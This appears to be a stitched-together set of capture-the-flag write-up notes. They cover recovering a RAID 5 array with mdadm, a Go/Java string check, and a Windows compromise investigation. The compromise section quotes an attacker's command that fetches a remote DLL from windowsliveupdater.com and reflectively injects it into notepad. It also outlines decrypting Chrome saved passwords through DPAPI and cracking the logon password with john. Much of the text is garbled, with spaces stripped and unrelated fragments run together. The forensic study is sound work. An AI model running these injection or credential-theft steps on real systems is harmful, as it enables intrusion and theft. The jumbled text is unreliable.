[@Ray](https://maplebacon.org/authors/Ray/) did the initial analysis - `windowsliveupdater.com` is the controllers domain which means anything from it is sus
-whichgaveusaweirdstring`qjyXB&;c@` thats not leetspeak but still satisfies the java check for some reason and thats not the flag indeed so i assumed its another golang issue where the check aint complete
- so i changed it to spew out all possible strings and manually get the right one lol
technically this was started before free service but i got so fed up with debugging the raid script i went to solve free service instead lmfao and i got it in a heartbeat
tl;dr painfully trying to recreate the raid 5 structure and failing until realizing mdadm raid superblock exists and i can just mount it with mdadm to grab the flag
most of the raid solutions online are paid, so i couldnt really use them
so its time to hunt for a raid script that might help but its so hard to find for some reason
finally settled on https://github.com/codysoyland/pyraid but even this had a lot of problems (in fact im pretty sure i either broke sth or its originally already broken that its still not usable to recover mdadm arrays even with the information presented in there lmao) namely no recovery using parity so i had to code that myself
eventually i actually got the linux filesystem repaired that testdisk can recognize it and even list out the files in the disk
but no matter what params i try with it i always end up getting bad pdfs or no pdfs with photorec
so i tried making a script that scans for the pdf metadata that i know must exist for the file to be complete and then brute forced the stripe size and offsets and even disk ordering
but still none of them gave more than a strip of weird color in image in the pdf
so i practically gave up until i was talking to [@ko](https://maplebacon.org/authors/ko/) about how if we can find a header in the file then we can probably math our way out
and i realized since i saw `md0` back when i first `strings`'d the disks it should be a linux raid
and that turned out to have a superblock which matches exactly at `0x1000` with the `longnte:md0` string in the name field for both disk1 and disk2 according to https://raid.wiki.kernel.org/index.php/RAID_superblock_formats
so i started extracting the array information and plugging it into pyraid to recover the disk
except it STILL didnt work so i tried to verify using `mdadm --examine /dev/loop8` after mounting the drives with `sudo losetup /dev/loop8 forensics_intergalactic_recovery/disk1.img` for both of the good ones
didnt work, but i noticed how the magic header for the superblock is gone, so i added it back in with vim's `:%!xxd`, `i`, edit, ctrl-c, then `:%!xxd -r`, and finally `:Wq` to write hex data on command line
and now mdadm actually recognizes the drives
while i was looking at the values (which matched the ones i manually extracted) i thought hey since mdadm already can recognize it whats stopping it from letting me make an array with it and mount which should handle the parity calculation for me
so i did `sudo bash -c 'mdadm --detail --scan >> /etc/mdadm/mdadm.conf'` (which idk if its needed but "fixes"thenotfoundinconfigissue)(jkitdoesntcozINACTIVE_ARRAYisnotrecognized)andthen`sudomdadm--assemble--force--verbose/dev/md127/dev/loop8/dev/loop9`toassemblethedrives
eitherway`Invoke-ReflectivePEInjection-PEUrlhttps://windowsliveupdater.com/winmgr.dll -ProcName notepad` EY `windowsliveupdater.com` from the older forensics chall means we definitely are on the right track
nottomention***Reflective***PEInjectionanyway
icantfindthe`https://windowsliveupdater.com/sysdriver.ps1` that it loads in memory but it turned out to be the script for the command https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1
thentheusual`.process/p/r`stufffromarcademoddingdays(use`.sympathsrv*https://msdl.microsoft.com/download/symbols` though coz IDA look for local symbols only by default)
[@Ray](https://maplebacon.org/authors/Ray/) said its related to chrome, so i digged around in the files and found `Login Data` which does indeed have windowsliveupdater for saved passwords
eventuallyitlooksliketheonlythingweneedistheuserlogonpasswordthenwecandecryptwithhttps://github.com/tijldeneut/dpapilab-ng (i originally found the old ver which is python 2 which didnt want to run on my laptop but same gist)
[@Ray](https://maplebacon.org/authors/Ray/) found out john can crack user logon password with masterkey https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py, which is way faster than the tool mentioned in passcape